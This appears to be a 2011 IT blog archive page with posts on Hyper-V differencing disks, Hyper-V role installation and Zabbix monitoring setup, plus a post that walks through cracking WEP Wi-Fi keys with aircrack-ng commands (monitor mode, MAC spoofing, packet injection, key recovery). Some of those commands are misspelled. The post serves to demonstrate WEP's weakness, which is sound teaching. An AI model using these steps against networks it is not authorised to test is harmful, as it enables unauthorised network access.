Monday, September 26, 2011

Virtual Hard Disk

There is one feature that bring into my attention in the Microsoft HYPER-V, in the standard virtualization environment. I think some of you might hear about static disk or thin disk provisioning.

Microsoft did a good job in introducing a new type of disk which they called differing disk. Microsoft HYPER-V use the virtual hard drive or VHD to store virtual machine data.The disk can be created in a very simple environment or in a very complex environment.To give you an idea , do have a look in the figure as below:


The main problem on this type of deployment, it is very hard for you to identified which is the differencing disk or the normal disk and the best practice, those disk need to be name with a meaningful name.

I see this feature is good for deployment of QA server or development. You can quickly setup a new instance within a minutes.

The step below show you how to configure a differencing disk.

Requirement: You must have a base Operating system installed.

Step 1:

Step 2:

Step 3: 
Key in a new name for your new disk

Step 4:
Locate the existing base that you will like to use

Step 5:

Please take note that , the base disk need to be set read only to avoid any alteration from the child disk and also make sure you do backup the base operating system VHD.If not you will get error message as below.
When you do hit to the screen as above you will have 2 option which will help you to reconnect it back to the base disk.
1)Inspect disk
2)edit disk

So my recommendation is do not use use this for production environment especially on the cluster environment as this might impact the performance.As I do mention it is good for DEV or QA. Once you are comfortable with the machine you can convert the disk into dynamic or fixed disk.

The step above will show you the steps.
Step 1:


Step 2:

Step 3:

Step 4:

Step 5:
 

After you have convert the disk to a fixed or dynamic disk, make sure you configure you VM to locate the new VHD.

You can see deploying a test server within few clicks:).

Thursday, September 22, 2011

Wireless Hacking - Wired Equivalent privacy(WEP)

The most hacking I see it is the most easiest will be Wired Equivalent privacy(WEP) hacking, but till now there is still a lot of people using it.Maybe they need to be train to understand the risk behind it.

Some of the company I see they will use the Wired Equivalent privacy(WEP) and they believe MAC address filtering to protect from unauthorized users from accessing their infrastructure.Here I would show you some of the basic of it.Well let give you a short summary what is needed. You will need to have a wireless device and I do recommend the device as below



The strange thing is the device is from Taiwan and I was trying to look for it, but no one is aware of the brand.You can purchase the devices from DBROTH via Amazon Fulfillment

Overview of Wireless Equivalent Privacy(WEP)

WEP keys come in two sizes: 40 bit (5 byte) and 104 bit (13 byte). Initially, vendors supported only 40-bit keys. By today’s standards, 40-bit keys are ridiculously small.

As for today, many people use 104-bit keys. It should be noted that some vendors refer to these as 64-bit and 128-bit keys. A few vendors even support 256-bit keys. Vendors arrive at these numbers because Wired Equivalent privacy(WEP) uses a 24-bit initialization vector (IV). Because the IVs are sent in the clear, however, the key length is effectively 40 or 104 bit.

This article is provided for informational purposes only and its affiliates
accept no liability for providing this information. Please only use to test
configurations on your own equipment. Accessing WIFI networks that do
not belong to you is ILLEGAL.
This article will explain how to crack 64bit and 128bit Wired Equivalent privacy(WEP) on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using Wired Equivalent privacy(WEP) Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the Wired Equivalent privacy(WEP) key. Please use the document at your own risk, and the
author of this document wont be responsible for every single damage that
perform by anyone who use this material

Attacking Wired Equivalent Privacy(WEP) with client
Requirements:
Backtrack 4 on CD or USB
Computer with compatible 802.11 wireless card
Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 4. If you
haven’t figured that part out, you probably shouldn’t be trying to crack
WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel®
PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw

The above commands will enable monitor mode on the wireless chipset in
your computer. Next we must stop your WIFI card:

iwconfig

Take note of your wireless adapter’s interface name. Then stop the adapter
by issuing:

airmon-ng stop [device]

Then:

ifconfig down [interface]

Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]

Its now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of
the target network. Now we must start collecting data from the WIFI access
point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]


The above command will output data collected to the file: network.out.
This file will be fed into the Wired Equivalent privacy(WEP) Crack program when we are ready to crack
the WEP key.

Open another shell and leave the previous command running. Now we
need to generate some fake packets to the access point to speed up the
data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]


If this command is successful we will now generate many packets on the
target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

or

airreply-ng –arpreplay –h 00:11:22:33:44:55 –b [BSSID] [device]


This will force the access point to send out a bunch of packets which we can
then use to crack the WEP key. Check your aerodump-ng shell and you
should see the “data” section filling up with packets


After about 10,000-20,000 you can begin cracking the WEP key. If there are
no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66
[device]


Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key
by changing the value of N to 64.


Once the crack is successful you will be left with the wireless key! Remove the :
from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a
bad idea. I suggest you use WPA2 encryption on your wireless networks.
Good luck!







Tuesday, September 20, 2011

Installing Hyper-V role in Windows 2008 core

Managing Windows 2008 server core system might be a nightmare for technical person that which are use to the GUI.Microsoft have the statement saying that core system have minimize the number of patch needed. You can't use the servermanagercmd here as it is not part of the the core system installation method.In core system we use ocsetup.Just to check the list of the role you can type the following command oclist | more

You will need to execute a single command to enable the feature. Please take note that the Microsoft-Hyper-V is case sensitive. You must enter it as shown.





Don't worry too much to the management of the HYPER-V on core system as you can use the server manager to add the server to be part of the list as shown below. What you need to do is click on connect to server.

Installation Option For Hyper-V role in Windows 2008

Method of installing HYPER-V role is depend on the version of the windows server 2008 you have installed. The installation option you see here will be more toward non core windows 2008. I will show you how you can installed by the option listed below.

1)Server Manager MMC
2)Server Manager cmd

Both of the option do a pretty good job, one of the different between this 2 option is servermanagercmd you have no way to stop it, while server manager mmc you still have the option to stop it.If you ask me I will choose which option, I would strongly recommend option 2.

Server Manager MMC Installation Steps





You be expecting to see more network card if you have more than 1.In this test lab I am installing on IBM T400.




Server Manager CMD Installation Steps



The step to remove for hyper-v by issuing the command servermanagercmd -remove hyper-v)

Sunday, September 18, 2011

Installing Zabbix Server (Monitoring)

Hi there,

Here by I would like to share the how to built your own monitoring server using opensource system. What I have show will be performance monitoring over windows machine and I believe it can do more then that.

The areas that I didn't cover will be the adding logic to zabbix server when certain scenario hit. (e.g. DHCP stop)

The product will be zabbix and it is a open source platform for monitoring. What you will need to know will be some linux skills which I be going to cover in this session. The tools so far I see it is quite good and it is can manage windows machine as well. But then again the drawback will be it is complicated. The operating system I would like to recommended you guys to install will be SUSE Enterprise Linux 10 or opensuse. The origin of the operating system is from German

1)http://www.zabbix.com/
2)http://en.wikipedia.org/wiki/SUSE_Linux_distributions

Let me give you some idea what you be going to expect from this. You will have a very nice graphical report for CPU, memory , network interface and etc. Please take note the following it is not part of the zabbix default configuration and it need customization.

Here you go the steps and please do feedback if you have any suggestion or idea.

Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring

Create Item For Monitoring

This would be the last steps, what you need to do is to input all those item that you will like to monitor. For example if you will like to monitor for cpu. On the windows server it self open a cmd and type the following command

typeperf -qx | findstr Processor > cpu.txt

This will list all of the processor monitoring and you need to find the right string which have the following format

\UDPv6\Datagrams Sent/sec









Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring

Create Host For Monitoring

We are almost there, now we need to create the host profile for monitoring





Click on the create host


Input the servername and also the ip address of the target server you want to monitor



Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring

Install & Configure zabbix client on Windows server

1) Create a folder zabbix in c:\program files\zabbix\

2) Copy zabbix_agentd.exe & zabbix_agentd.conf to the zabbix folder

3) Edit zabbix_agentd.conf with notepad and add the following entry to it



4) Install the zabbix as service by issue the following command on c:\program files\zabbix\zabbix_agentd.exe -i -c zabbix_agentd.conf

5) Start the service by issue the following command on c:\program files\zabbix\zabbix_agentd.exe -s -c zabbix_agentd.conf

Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring

Configure Zabbix Web Interface

Configure zabbix web interface

The default username and password will be the following
Username : admin
Password : zabbix





















Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring